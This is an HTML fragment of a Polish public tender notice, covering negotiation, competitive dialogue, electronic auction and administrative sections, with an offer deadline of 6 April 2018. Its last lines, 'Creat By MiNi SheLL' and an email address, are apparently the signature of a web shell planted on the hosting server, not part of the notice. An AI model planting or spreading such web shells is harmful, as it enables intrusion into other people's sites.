id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-04-06</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">08:45</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com